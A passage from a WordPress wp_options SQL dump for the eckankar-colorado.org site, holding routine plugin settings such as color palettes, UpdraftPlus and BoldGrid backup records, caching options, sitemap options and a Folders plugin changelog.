21:00:40','yes'),(62601,'pum-has-cached-css','1620095767','yes'),(62602,'pum-has-cached-js','1620095767','yes'),(62650,'pum_all_theme_close_text_cache','a:11:{i:132184;s:0:\"\";i:262135;s:2:\"×\";i:262134;s:2:\"×\";i:262133;s:2:\"×\";i:261714;s:2:\"×\";i:261713;s:2:\"×\";i:132183;s:5:\"CLOSE\";i:132185;s:2:\"×\";i:132186;s:2:\"×\";i:132187;s:2:\"×\";i:132188;s:2:\"×\";}','yes'),(62651,'pum_total_open_count','259','yes'),(63044,'kt_color_grid_palette','a:5:{i:0;a:8:{s:5:\"color\";s:7:\"#23507D\";s:3:\"hex\";s:7:\"#23507D\";s:4:\"name\";s:18:\"ECK site dark blue\";s:8:\"variable\";s:15:\"ECKsitedarkblue\";s:5:\"alpha\";i:100;s:5:\"index\";s:1:\"1\";s:6:\"status\";i:1;s:4:\"type\";i:1;}i:1;a:8:{s:5:\"color\";s:7:\"#F28A27\";s:3:\"hex\";s:7:\"#F28A27\";s:4:\"name\";s:15:\"ECK site orange\";s:8:\"variable\";s:13:\"ECKsiteorange\";s:5:\"alpha\";i:100;s:5:\"index\";s:1:\"3\";s:6:\"status\";i:1;s:4:\"type\";i:1;}i:2;a:8:{s:5:\"color\";s:7:\"#1D5791\";s:3:\"hex\";s:7:\"#1D5791\";s:4:\"name\";s:21:\"ECK site lighter blue\";s:8:\"variable\";s:18:\"ECKsitelighterblue\";s:5:\"alpha\";i:100;s:5:\"index\";s:1:\"2\";s:6:\"status\";i:1;s:4:\"type\";i:1;}i:3;a:8:{s:5:\"color\";s:7:\"#666666\";s:3:\"hex\";s:7:\"#666666\";s:4:\"name\";s:14:\"ECK Light Gray\";s:8:\"variable\";s:12:\"ECKLightGray\";s:5:\"alpha\";i:100;s:5:\"index\";s:1:\"4\";s:6:\"status\";i:1;s:4:\"type\";i:1;}i:4;a:8:{s:5:\"color\";s:7:\"#333333\";s:3:\"hex\";s:7:\"#333333\";s:4:\"name\";s:13:\"ECK Dark Gray\";s:8:\"variable\";s:11:\"ECKDarkGray\";s:5:\"alpha\";i:100;s:5:\"index\";s:1:\"5\";s:6:\"status\";i:1;s:4:\"type\";i:1;}}','yes'),(63045,'kt_color_grid_map','a:3:{s:3:\"map\";a:250:{i:0;s:6:\"23507D\";i:1;s:18:\"ECK site dark blue\";i:2;s:6:\"4e0000\";i:3;s:0:\"\";i:4;s:6:\"4e2700\";i:5;s:0:\"\";i:6;s:6:\"4e4e00\";i:7;s:0:\"\";i:8;s:6:\"274e00\";i:9;s:0:\"\";i:10;s:6:\"004e00\";i:11;s:0:\"\";i:12;s:6:\"004e27\";i:13;s:0:\"\";i:14;s:6:\"004e4e\";i:15;s:0:\"\";i:16;s:6:\"00274e\";i:17;s:0:\"\";i:18;s:6:\"00004e\";i:19;s:0:\"\";i:20;s:6:\"27004e\";i:21;s:0:\"\";i:22;s:6:\"4e004e\";i:23;s:0:\"\";i:24;s:6:\"4e0027\";i:25;s:0:\"\";i:26;s:6:\"000000\";i:27;s:0:\"\";i:28;s:6:\"F28A27\";i:29;s:15:\"ECK site orange\";i:30;s:6:\"950000\";i:31;s:0:\"\";i:32;s:6:\"954a00\";i:33;s:0:\"\";i:34;s:6:\"959500\";i:35;s:0:\"\";i:36;s:6:\"4a9500\";i:37;s:0:\"\";i:38;s:6:\"009500\";i:39;s:0:\"\";i:40;s:6:\"00954a\";i:41;s:0:\"\";i:42;s:6:\"009595\";i:43;s:0:\"\";i:44;s:6:\"004a95\";i:45;s:0:\"\";i:46;s:6:\"000095\";i:47;s:0:\"\";i:48;s:6:\"4a0095\";i:49;s:0:\"\";i:50;s:6:\"950095\";i:51;s:0:\"\";i:52;s:6:\"95004a\";i:53;s:0:\"\";i:54;s:6:\"242424\";i:55;s:0:\"\";i:56;s:6:\"1D5791\";i:57;s:21:\"ECK site lighter blue\";i:58;s:6:\"ce0000\";i:59;s:0:\"\";i:60;s:6:\"ce6700\";i:61;s:0:\"\";i:62;s:6:\"cece00\";i:63;s:0:\"\";i:64;s:6:\"67ce00\";i:65;s:0:\"\";i:66;s:6:\"00ce00\";i:67;s:0:\"\";i:68;s:6:\"00ce67\";i:69;s:0:\"\";i:70;s:6:\"00cece\";i:71;s:0:\"\";i:72;s:6:\"0067ce\";i:73;s:0:\"\";i:74;s:6:\"0000ce\";i:75;s:0:\"\";i:76;s:6:\"6700ce\";i:77;s:0:\"\";i:78;s:6:\"ce00ce\";i:79;s:0:\"\";i:80;s:6:\"ce0067\";i:81;s:0:\"\";i:82;s:6:\"484848\";i:83;s:0:\"\";i:84;s:6:\"666666\";i:85;s:14:\"ECK Light Gray\";i:86;s:6:\"f20000\";i:87;s:0:\"\";i:88;s:6:\"f27900\";i:89;s:0:\"\";i:90;s:6:\"f2f200\";i:91;s:0:\"\";i:92;s:6:\"79f200\";i:93;s:0:\"\";i:94;s:6:\"00f200\";i:95;s:0:\"\";i:96;s:6:\"00f279\";i:97;s:0:\"\";i:98;s:6:\"00f2f2\";i:99;s:0:\"\";i:100;s:6:\"0079f2\";i:101;s:0:\"\";i:102;s:6:\"0000f2\";i:103;s:0:\"\";i:104;s:6:\"7900f2\";i:105;s:0:\"\";i:106;s:6:\"f200f2\";i:107;s:0:\"\";i:108;s:6:\"f20079\";i:109;s:0:\"\";i:110;s:6:\"6d6d6d\";i:111;s:0:\"\";i:112;s:6:\"333333\";i:113;s:13:\"ECK Dark Gray\";i:114;s:6:\"ff0000\";i:115;s:0:\"\";i:116;s:6:\"ff7f00\";i:117;s:0:\"\";i:118;s:6:\"ffff00\";i:119;s:0:\"\";i:120;s:6:\"7fff00\";i:121;s:0:\"\";i:122;s:6:\"00ff00\";i:123;s:0:\"\";i:124;s:6:\"00ff7f\";i:125;s:0:\"\";i:126;s:6:\"00ffff\";i:127;s:0:\"\";i:128;s:6:\"007fff\";i:129;s:0:\"\";i:130;s:6:\"0000ff\";i:131;s:0:\"\";i:132;s:6:\"7f00ff\";i:133;s:0:\"\";i:134;s:6:\"ff00ff\";i:135;s:0:\"\";i:136;s:6:\"ff007f\";i:137;s:0:\"\";i:138;s:6:\"919191\";i:139;s:0:\"\";i:140;s:6:\"FFFFFF\";i:141;s:0:\"\";i:142;s:6:\"ff5e5e\";i:143;s:0:\"\";i:144;s:6:\"ffae5e\";i:145;s:0:\"\";i:146;s:6:\"ffff5e\";i:147;s:0:\"\";i:148;s:6:\"aeff5e\";i:149;s:0:\"\";i:150;s:6:\"5eff5e\";i:151;s:0:\"\";i:152;s:6:\"5effae\";i:153;s:0:\"\";i:154;s:6:\"5effff\";i:155;s:0:\"\";i:156;s:6:\"5eaeff\";i:157;s:0:\"\";i:158;s:6:\"5e5eff\";i:159;s:0:\"\";i:160;s:6:\"ae5eff\";i:161;s:0:\"\";i:162;s:6:\"ff5eff\";i:163;s:0:\"\";i:164;s:6:\"ff5eae\";i:165;s:0:\"\";i:166;s:6:\"b6b6b6\";i:167;s:0:\"\";i:168;s:6:\"FFFFFF\";i:169;s:0:\"\";i:170;s:6:\"ff9191\";i:171;s:0:\"\";i:172;s:6:\"ffc891\";i:173;s:0:\"\";i:174;s:6:\"ffff91\";i:175;s:0:\"\";i:176;s:6:\"c8ff91\";i:177;s:0:\"\";i:178;s:6:\"91ff91\";i:179;s:0:\"\";i:180;s:6:\"91ffc8\";i:181;s:0:\"\";i:182;s:6:\"91ffff\";i:183;s:0:\"\";i:184;s:6:\"91c8ff\";i:185;s:0:\"\";i:186;s:6:\"9191ff\";i:187;s:0:\"\";i:188;s:6:\"c891ff\";i:189;s:0:\"\";i:190;s:6:\"ff91ff\";i:191;s:0:\"\";i:192;s:6:\"ff91c8\";i:193;s:0:\"\";i:194;s:6:\"dadada\";i:195;s:0:\"\";i:196;s:6:\"FFFFFF\";i:197;s:0:\"\";i:198;s:6:\"ffbaba\";i:199;s:0:\"\";i:200;s:6:\"ffdcba\";i:201;s:0:\"\";i:202;s:6:\"ffffba\";i:203;s:0:\"\";i:204;s:6:\"dcffba\";i:205;s:0:\"\";i:206;s:6:\"baffba\";i:207;s:0:\"\";i:208;s:6:\"baffdc\";i:209;s:0:\"\";i:210;s:6:\"baffff\";i:211;s:0:\"\";i:212;s:6:\"badcff\";i:213;s:0:\"\";i:214;s:6:\"babaff\";i:215;s:0:\"\";i:216;s:6:\"dcbaff\";i:217;s:0:\"\";i:218;s:6:\"ffbaff\";i:219;s:0:\"\";i:220;s:6:\"ffbadc\";i:221;s:0:\"\";i:222;s:6:\"ffffff\";i:223;s:0:\"\";i:224;s:6:\"FFFFFF\";i:225;s:0:\"\";i:226;s:6:\"ffdede\";i:227;s:0:\"\";i:228;s:6:\"ffeede\";i:229;s:0:\"\";i:230;s:6:\"ffffde\";i:231;s:0:\"\";i:232;s:6:\"eeffde\";i:233;s:0:\"\";i:234;s:6:\"deffde\";i:235;s:0:\"\";i:236;s:6:\"deffee\";i:237;s:0:\"\";i:238;s:6:\"deffff\";i:239;s:0:\"\";i:240;s:6:\"deeeff\";i:241;s:0:\"\";i:242;s:6:\"dedeff\";i:243;s:0:\"\";i:244;s:6:\"eedeff\";i:245;s:0:\"\";i:246;s:6:\"ffdeff\";i:247;s:0:\"\";i:248;s:6:\"ffdeee\";i:249;s:0:\"\";}s:4:\"rows\";s:1:\"9\";s:7:\"columns\";i:14;}','yes'),(63046,'kt_color_grid_version','1.15.5','yes'),(63088,'kt_color_grid_customizer','1','yes'),(63089,'kt_color_grid_gutenberg','1','yes'),(63090,'kt_color_grid_gutenberg_merge','1','yes'),(63091,'kt_color_grid_next_index','6','yes'),(63092,'kt_color_grid_type','rainbow','yes'),(63093,'kt_color_grid_visual','1','yes'),(63094,'kt_color_grid_rows','9','yes'),(63095,'kt_color_grid_cols','12','yes'),(63096,'kt_color_grid_luma','natural','yes'),(63097,'kt_color_grid_blocks','6','yes'),(63098,'kt_color_grid_block_size','5','yes'),(63099,'kt_color_grid_block_axis','rgb','yes'),(63100,'kt_color_grid_spread','even','yes'),(63101,'kt_color_grid_clamp','column','yes'),(63102,'kt_color_grid_clamps','8','yes'),(142406,'updraftplus_dismisseddashnotice','1729810080','yes'),(148659,'widget_login_logout','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(154748,'updraftplus_unlocked_fd','1','no'),(154749,'updraftplus_last_lock_time_fd','2023-04-14 20:22:43','no'),(154750,'updraftplus_semaphore_fd','0','no'),(154751,'updraft_last_scheduled_fd','1681503763','yes'),(154787,'updraft_backup_history','a:3:{i:1681503762;a:19:{s:7:\"plugins\";a:1:{i:0;s:68:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-plugins.zip\";}s:12:\"plugins-size\";i:81796463;s:6:\"themes\";a:1:{i:0;s:67:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-themes.zip\";}s:11:\"themes-size\";i:8448541;s:7:\"uploads\";a:1:{i:0;s:68:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-uploads.zip\";}s:12:\"uploads-size\";i:271175163;s:6:\"others\";a:1:{i:0;s:67:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-others.zip\";}s:11:\"others-size\";i:8452470;s:2:\"db\";s:62:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-db.gz\";s:7:\"db-size\";i:4985493;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"e34294395cdde00adf297ece55ab2ff9ea6c7967\";s:7:\"themes0\";s:40:\"281343ff87740aa17148a6ba26f2d4c762cb7e17\";s:8:\"uploads0\";s:40:\"beb4da71596f48e4f0620c6dac49fceb36982326\";s:7:\"others0\";s:40:\"5dc17cbbc6d914b4d9a450d66c212a9a328c289c\";s:3:\"db0\";s:40:\"d7862bb3c87944c88a407cb9f55138a0bc50d9eb\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"47216894034a10402ecccda0f96ecabce7c8047cce58c2d8b7c662461b46736c\";s:7:\"themes0\";s:64:\"b82d0ec382c27fc45e7bf51368a5d70c87f7b709a11a8b2a3ea395aebd07d2cf\";s:8:\"uploads0\";s:64:\"095045ced4656ccbf896e7b4566ecec65fb3522e7efcd341aa96d2216c62db04\";s:7:\"others0\";s:64:\"6bd44313cb66505714ceb47e8fcb6848d80808fc9ae2d8e8608b453e3b6e9fae\";s:3:\"db0\";s:64:\"a198b85dc68e455ca36351a9857f2a8a28251e906993dcbab190c97344aaaf02\";}}s:5:\"nonce\";s:12:\"da6922662be6\";s:7:\"service\";a:1:{i:0;s:7:\"dropbox\";}s:20:\"service_instance_ids\";a:1:{s:7:\"dropbox\";a:1:{i:0;s:34:\"s-2a887e7f61457cf95adaa834f8cd3423\";}}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1681503763;s:6:\"themes\";i:1681503906;s:7:\"uploads\";i:1681503916;s:6:\"others\";i:1681504096;}s:18:\"created_by_version\";s:6:\"1.23.3\";s:21:\"last_saved_by_version\";s:6:\"1.23.3\";s:12:\"is_multisite\";b:0;}i:1679512242;a:19:{s:7:\"plugins\";a:1:{i:0;s:68:\"backup_2023-03-22-1310_Eckankar_In_Colorado_a952c83a5d9c-plugins.zip\";}s:12:\"plugins-size\";i:81746043;s:6:\"themes\";a:1:{i:0;s:67:\"backup_2023-03-22-1310_Eckankar_In_Colorado_a952c83a5d9c-themes.zip\";}s:11:\"themes-size\";i:14448604;s:7:\"uploads\";a:1:{i:0;s:68:\"backup_2023-03-22-1310_Eckankar_In_Colorado_a952c83a5d9c-uploads.zip\";}s:12:\"uploads-size\";i:258290598;s:6:\"others\";a:1:{i:0;s:67:\"backup_2023-03-22-1310_Eckankar_In_Colorado_a952c83a5d9c-others.zip\";}s:11:\"others-size\";i:8449162;s:2:\"db\";s:62:\"backup_2023-03-22-1310_Eckankar_In_Colorado_a952c83a5d9c-db.gz\";s:7:\"db-size\";i:4991772;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"e153725a6ff6ecb3d107a034422ada66b4520510\";s:7:\"themes0\";s:40:\"1e687e198d80f62302a9009e771d2a3dffc0c841\";s:8:\"uploads0\";s:40:\"86ae3b3b55c4ef0552861f50936d42185dd2a758\";s:7:\"others0\";s:40:\"d2d66e8ac2406c1ca64dc452cdb976dd78a6c390\";s:3:\"db0\";s:40:\"335aa17b4566277947d22af4d4149ded0fd943f0\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"94bd737df515b668d871f4830ed8c375b06b99749684898f2ee31b68e77a7809\";s:7:\"themes0\";s:64:\"88a60573bd2d2a68f166cdf5c6c56a1659c9d910ab8f4b64a45247fd5f0ee6d4\";s:8:\"uploads0\";s:64:\"be8b78606b6c6974a066b115d7d4ff15f59febde589db1edb00d03e20ac57cf6\";s:7:\"others0\";s:64:\"3d4779cbf3a7ac9e1f444d57ef511213bc76779ff9c95d72717231c971345fac\";s:3:\"db0\";s:64:\"bbbd1a3b5da951d5a255a25fc6c3644992d09cb281008362bb971a98c63f6b67\";}}s:5:\"nonce\";s:12:\"a952c83a5d9c\";s:7:\"service\";a:1:{i:0;s:7:\"dropbox\";}s:20:\"service_instance_ids\";a:1:{s:7:\"dropbox\";a:1:{i:0;s:34:\"s-2a887e7f61457cf95adaa834f8cd3423\";}}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1679512242;s:6:\"themes\";i:1679512359;s:7:\"uploads\";i:1679512372;s:6:\"others\";i:1679512631;}s:18:\"created_by_version\";s:6:\"1.23.3\";s:21:\"last_saved_by_version\";s:6:\"1.23.3\";s:12:\"is_multisite\";b:0;}i:1672429200;a:14:{s:20:\"service_instance_ids\";a:1:{s:7:\"dropbox\";a:1:{i:0;s:34:\"s-2a887e7f61457cf95adaa834f8cd3423\";}}s:7:\"service\";a:1:{i:0;s:7:\"dropbox\";}s:7:\"plugins\";a:1:{i:0;s:68:\"backup_2022-12-30-1240_Eckankar_In_Colorado_c862ff8ef126-plugins.zip\";}s:5:\"nonce\";s:12:\"c862ff8ef126\";s:12:\"plugins-size\";i:79592912;s:6:\"native\";b:0;s:6:\"themes\";a:1:{i:0;s:67:\"backup_2022-12-30-1240_Eckankar_In_Colorado_c862ff8ef126-themes.zip\";}s:11:\"themes-size\";i:14448604;s:2:\"db\";s:62:\"backup_2022-12-30-1240_Eckankar_In_Colorado_c862ff8ef126-db.gz\";s:7:\"db-size\";i:5738793;s:7:\"uploads\";a:1:{i:0;s:68:\"backup_2022-12-30-1240_Eckankar_In_Colorado_c862ff8ef126-uploads.zip\";}s:12:\"uploads-size\";i:238443397;s:6:\"others\";a:1:{i:0;s:67:\"backup_2022-12-30-1240_Eckankar_In_Colorado_c862ff8ef126-others.zip\";}s:11:\"others-size\";i:7206839;}}','no'),(154788,'updraft_last_backup','a:6:{s:11:\"backup_time\";i:1681503762;s:12:\"backup_array\";a:11:{s:7:\"plugins\";a:1:{i:0;s:68:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-plugins.zip\";}s:12:\"plugins-size\";i:81796463;s:6:\"themes\";a:1:{i:0;s:67:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-themes.zip\";}s:11:\"themes-size\";i:8448541;s:7:\"uploads\";a:1:{i:0;s:68:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-uploads.zip\";}s:12:\"uploads-size\";i:271175163;s:6:\"others\";a:1:{i:0;s:67:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-others.zip\";}s:11:\"others-size\";i:8452470;s:2:\"db\";s:62:\"backup_2023-04-14-1422_Eckankar_In_Colorado_da6922662be6-db.gz\";s:7:\"db-size\";i:4985493;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"e34294395cdde00adf297ece55ab2ff9ea6c7967\";s:7:\"themes0\";s:40:\"281343ff87740aa17148a6ba26f2d4c762cb7e17\";s:8:\"uploads0\";s:40:\"beb4da71596f48e4f0620c6dac49fceb36982326\";s:7:\"others0\";s:40:\"5dc17cbbc6d914b4d9a450d66c212a9a328c289c\";s:3:\"db0\";s:40:\"d7862bb3c87944c88a407cb9f55138a0bc50d9eb\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"47216894034a10402ecccda0f96ecabce7c8047cce58c2d8b7c662461b46736c\";s:7:\"themes0\";s:64:\"b82d0ec382c27fc45e7bf51368a5d70c87f7b709a11a8b2a3ea395aebd07d2cf\";s:8:\"uploads0\";s:64:\"095045ced4656ccbf896e7b4566ecec65fb3522e7efcd341aa96d2216c62db04\";s:7:\"others0\";s:64:\"6bd44313cb66505714ceb47e8fcb6848d80808fc9ae2d8e8608b453e3b6e9fae\";s:3:\"db0\";s:64:\"a198b85dc68e455ca36351a9857f2a8a28251e906993dcbab190c97344aaaf02\";}}}s:7:\"success\";i:1;s:6:\"errors\";a:0:{}s:12:\"backup_nonce\";s:12:\"da6922662be6\";s:26:\"nonincremental_backup_time\";i:1681503762;}','yes'),(155328,'wp-optimize-dismiss_dash_notice_until','1730603744','yes'),(230582,'folders_show_review_box_after','2020-01-23','yes'),(231018,'admin_email_lifespan','1701190205','yes'),(231019,'db_upgraded','','yes'),(238027,'duplicate_post_show_original_column','','yes'),(238028,'duplicate_post_show_original_in_post_states','','yes'),(238029,'duplicate_post_show_original_meta_box','','yes'),(241931,'fs_cache_1938','a:2:{s:16:\"tabs_stylesheets\";O:8:\"stdClass\":3:{s:6:\"result\";a:1:{i:0;s:116:\"https://eckankar-colorado.org/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/assets/css/admin.min.css\";}s:7:\"created\";i:1583007800;s:9:\"timestamp\";i:1583612600;}s:4:\"tabs\";O:8:\"stdClass\":3:{s:6:\"result\";s:569:\"<div class=\"wrap passster-admin\"><div class=\"passter-logo\" style=\"background-image:url(https://eckankar-colorado.org/wp-content/plugins/content-protector/assets/admin/passster-logo.png);background-size: contain;background-repeat: no-repeat;\"></div>\n<h2 class=\"nav-tab-wrapper\"><a href=\"#passster_shortcode\" class=\"nav-tab nav-tab-active\" id=\"passster_shortcode-tab\">Shortcode</a><a href=\"#passster_addons\" class=\"nav-tab\" id=\"passster_addons-tab\">Addons</a><a href=\"#passster_advanced_settings\" class=\"nav-tab\" id=\"passster_advanced_settings-tab\">Options</a></h2></div>\";s:7:\"created\";i:1583007802;s:9:\"timestamp\";i:1583612602;}}','no'),(248136,'nf_form_tel_sent','true','no'),(250097,'sdm_db_version','1.3','yes'),(250172,'sdm_categories_children','a:0:{}','yes'),(250285,'sdm_downloads_options','a:3:{s:27:\"general_hide_donwload_count\";s:2:\"on\";s:22:\"general_login_page_url\";s:0:\"\";s:21:\"download_button_color\";s:8:\"darkblue\";}','yes'),(259141,'wp-optimize-install-or-update-notice-version','1.1','yes'),(266987,'boldgrid_backup_tokens','a:2:{i:59;a:3:{s:2:\"id\";s:66:\"boldgrid-backup-eckankar-colorado.org-9ea03425-20231107-164245.zip\";s:5:\"token\";s:32:\"3c4f9ee1c18efd75d767e50cbb5cdb40\";s:7:\"expires\";i:1699379440;}i:60;a:3:{s:2:\"id\";s:66:\"boldgrid-backup-eckankar-colorado.org-9ea03425-20231107-165232.zip\";s:5:\"token\";s:32:\"b0c894320d88ad15d63ea4f2e3b398dc\";s:7:\"expires\";i:1699379625;}}','no'),(270970,'category_children','a:0:{}','yes'),(272056,'PTC_plugin_version','1.4.0','yes'),(273774,'new_admin_email','webmaster@eckankar-colorado.org','yes'),(294935,'bkup_c2c_remember_me_controls','a:5:{s:16:\"auto_remember_me\";s:0:\"\";s:19:\"remember_me_forever\";s:0:\"\";s:20:\"remember_me_duration\";s:0:\"\";s:19:\"disable_remember_me\";s:1:\"1\";s:8:\"_version\";s:3:\"2.0\";}','yes'),(309976,'wp-optimize-enable-auto-backup','false','yes'),(309977,'wp-optimize-enable-auto-backup-1','true','yes'),(309978,'updraftplus_unlocked_d','1','no'),(309979,'updraftplus_last_lock_time_d','2022-12-28 18:28:51','no'),(309980,'updraftplus_semaphore_d','0','no'),(309981,'updraft_last_scheduled_d','1672252131','yes'),(310631,'wordfence_syncAttackDataAttempts','0','no'),(310632,'wordfence_syncingAttackData','0','no'),(310635,'wordfence_lastSyncAttackData','1700584155','no'),(311236,'dismissed_general_notices_until','1586837410','yes'),(311251,'sm_options','a:60:{s:18:\"sm_b_prio_provider\";s:0:\"\";s:9:\"sm_b_ping\";b:1;s:10:\"sm_b_stats\";b:0;s:12:\"sm_b_autozip\";b:1;s:11:\"sm_b_memory\";s:0:\"\";s:9:\"sm_b_time\";i:-1;s:18:\"sm_b_style_default\";b:1;s:10:\"sm_b_style\";s:0:\"\";s:12:\"sm_b_baseurl\";s:0:\"\";s:11:\"sm_b_robots\";b:1;s:9:\"sm_b_html\";b:1;s:12:\"sm_b_exclude\";a:0:{}s:17:\"sm_b_exclude_cats\";a:0:{}s:10:\"sm_in_home\";b:1;s:11:\"sm_in_posts\";b:0;s:15:\"sm_in_posts_sub\";b:0;s:11:\"sm_in_pages\";b:1;s:10:\"sm_in_cats\";b:0;s:15:\"sm_product_tags\";b:1;s:17:\"sm_in_product_cat\";b:1;s:10:\"sm_in_arch\";b:0;s:10:\"sm_in_auth\";b:0;s:10:\"sm_in_tags\";b:0;s:9:\"sm_in_tax\";a:0:{}s:17:\"sm_in_customtypes\";a:0:{}s:13:\"sm_in_lastmod\";b:1;s:17:\"sm_b_sitemap_name\";s:7:\"sitemap\";s:16:\"sm_b_old_sm_name\";s:7:\"sitemap\";s:10:\"sm_cf_home\";s:5:\"daily\";s:11:\"sm_cf_posts\";s:7:\"monthly\";s:11:\"sm_cf_pages\";s:6:\"weekly\";s:10:\"sm_cf_cats\";s:6:\"weekly\";s:17:\"sm_cf_product_cat\";s:6:\"weekly\";s:10:\"sm_cf_auth\";s:6:\"weekly\";s:15:\"sm_cf_arch_curr\";s:5:\"daily\";s:14:\"sm_cf_arch_old\";s:6:\"yearly\";s:10:\"sm_cf_tags\";s:6:\"weekly\";s:10:\"sm_pr_home\";d:1;s:11:\"sm_pr_posts\";d:0.59999999999999997779553950749686919152736663818359375;s:15:\"sm_pr_posts_min\";d:0.200000000000000011102230246251565404236316680908203125;s:11:\"sm_pr_pages\";d:0.59999999999999997779553950749686919152736663818359375;s:10:\"sm_pr_cats\";d:0.299999999999999988897769753748434595763683319091796875;s:17:\"sm_pr_product_cat\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_arch\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_auth\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_tags\";d:0.299999999999999988897769753748434595763683319091796875;s:12:\"sm_i_donated\";b:0;s:17:\"sm_i_hide_donated\";b:0;s:17:\"sm_i_install_date\";b:0;s:16:\"sm_i_hide_survey\";b:0;s:14:\"sm_i_hide_note\";b:0;s:15:\"sm_i_hide_works\";b:0;s:16:\"sm_i_hide_donors\";b:0;s:9:\"sm_i_hash\";b:0;s:8:\"sm_i_tid\";s:0:\"\";s:13:\"sm_i_lastping\";i:1700585373;s:16:\"sm_i_supportfeed\";b:0;s:22:\"sm_i_supportfeed_cache\";b:0;s:13:\"sm_links_page\";i:10;s:15:\"sm_user_consent\";b:0;}','yes'),(311257,'sm_status','O:28:\"GoogleSitemapGeneratorStatus\":4:{s:40:\"\0GoogleSitemapGeneratorStatus\0start_time\";d:1700585373.6207010746002197265625;s:38:\"\0GoogleSitemapGeneratorStatus\0end_time\";d:1700585373.8011000156402587890625;s:42:\"\0GoogleSitemapGeneratorStatus\0ping_results\";a:1:{s:6:\"google\";a:5:{s:10:\"start_time\";d:1700585373.62271404266357421875;s:8:\"end_time\";d:1700585373.7953050136566162109375;s:7:\"success\";b:1;s:3:\"url\";s:104:\"http://www.google.com/webmasters/sitemaps/ping?sitemap=https%3A%2F%2Feckankar-colorado.org%2Fsitemap.xml\";s:4:\"name\";s:6:\"Google\";}}s:39:\"\0GoogleSitemapGeneratorStatus\0auto_save\";b:1;}','no'),(311446,'WpFastestCachePreLoad','{\"homepage\":0,\"page\":0,\"number\":\"4\",\"order\":0}','yes'),(311447,'WpFastestCache','{\"wpFastestCacheStatus\":\"on\",\"wpFastestCachePreload\":\"on\",\"wpFastestCachePreload_homepage\":\"on\",\"wpFastestCachePreload_page\":\"on\",\"wpFastestCachePreload_number\":\"4\",\"wpFastestCachePreload_order\":\"\",\"wpFastestCacheLoggedInUser\":\"on\",\"wpFastestCacheMobile\":\"on\",\"wpFastestCacheNewPost\":\"on\",\"wpFastestCacheNewPost_type\":\"all\",\"wpFastestCacheUpdatePost\":\"on\",\"wpFastestCacheUpdatePost_type\":\"all\",\"wpFastestCacheMinifyHtml\":\"on\",\"wpFastestCacheMinifyCss\":\"on\",\"wpFastestCacheCombineCss\":\"on\",\"wpFastestCacheCombineJs\":\"on\",\"wpFastestCacheGzip\":\"on\",\"wpFastestCacheLBC\":\"on\",\"wpFastestCacheDisableEmojis\":\"on\",\"wpFastestCacheLanguage\":\"en_US\"}','yes'),(311448,'wpfc-group','','yes'),(314360,'wp-optimize-back_up_delete_after','1','yes'),(314361,'wp-optimize-back_up_delete_after_days','99','yes'),(314362,'wp-optimize-show_smush_metabox','show','yes'),(314363,'wp-optimize-lossy_compression','','yes'),(314402,'wp-optimize-preserve_exif','','yes'),(314413,'wp-optimize-autosmush','1','yes'),(314477,'Re_Smush_It_Task','1669781887','yes'),(314488,'wp-optimize-completed_task_count','826','yes'),(314489,'wp-optimize-total_bytes_saved','32537885','yes'),(314490,'wp-optimize-total_percent_saved','12.231392251814','yes'),(314691,'aj_enabled','1','yes'),(314692,'aj_method','async','yes'),(314693,'aj_enabled_logged','','yes'),(314694,'aj_enabled_shop','','yes'),(314695,'aj_jquery','exclude','yes'),(314696,'aj_async','','yes'),(314697,'aj_defer','','yes'),(314698,'aj_exclusions','','yes'),(314699,'aj_plugin_exclusions','','yes'),(314700,'aj_theme_exclusions','','yes'),(314701,'aj_autoptimize_enabled','','yes'),(314702,'aj_autoptimize_method','async','yes'),(314703,'aj_version','2.21.08.31','yes'),(324796,'folders_hide_review_box','1','yes'),(324799,'pand-d83e5fe4823f8f867dc30d3bb0b6c7de','1603577924','no'),(328121,'edd_sl_59b3c434d9c870d51762f8f2b5ad5c93','a:2:{s:7:\"timeout\";i:1580015477;s:5:\"value\";s:4081:\"{\"new_version\":\"2.4.2\",\"stable_version\":\"2.4.2\",\"name\":\"Folders\",\"slug\":\"folders\",\"url\":\"https:\\/\\/go.premio.io\\/downloads\\/folders\\/?changelog=1\",\"last_updated\":\"2020-01-16 16:40:08\",\"homepage\":\"https:\\/\\/go.premio.io\\/downloads\\/folders\\/\",\"package\":\"\",\"download_link\":\"\",\"sections\":{\"description\":\"\",\"changelog\":\"<p>= 2.4.2 =<br \\/>\\nNew download folder as Zip feature<\\/p>\\n<p>= 2.4.1 =<br \\/>\\nPolylang media library fix<\\/p>\\n<p>= 2.4 =<br \\/>\\nFolder order when adding a media library file to posts\\/pages fix, infrastructure improvements, and license activation for none-ssl website support<\\/p>\\n<p>= 2.3.9 =<br \\/>\\nThrive Themes Architect bug fixed<\\/p>\\n<p>= 2.3.8 =<br \\/>\\nYou can bulk delete folders now. You can also create a new folder from the upload screen in the media library. We\'ve also fixed some bugs like Polylang compatibility bug, folders order bug, default folder bug, and other minor bugs.<\\/p>\\n<p>= 2.3.7 =<br \\/>\\nYou can customize the folders look and feel now: change colors, font, and size of folders. We\'ve also added some features to improve the easy-of-use like Enter key to create a new folder and 